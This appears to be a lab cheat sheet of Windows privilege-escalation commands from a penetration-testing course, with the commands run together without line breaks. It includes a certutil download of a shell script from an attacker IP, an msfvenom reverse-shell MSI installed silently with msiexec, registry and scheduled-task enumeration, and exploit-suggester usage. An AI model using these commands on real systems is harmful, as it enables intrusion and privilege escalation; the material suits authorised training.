Other Commands
certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.batcertutil -encode file1 encodedfilecertutil -decode encodedfile file2reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installerreg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installermsfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msimsiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestartschtasks /query /fo LIST /vGet-ScheduledTask | select TaskName,State.\accesschk64.exe /accepteula -s -d C:\Scripts\Get-LocalUserGet-WmiObject -Class Win32_OperatingSystem | select Descriptionguestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmdguestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1sudo python2.7 windows-exploit-suggester.py --updatepython2.7 windows-exploit-suggester.py --database 2021-05-13-mssb.xls --systeminfo win7lpe-systeminfo.txt
Last updated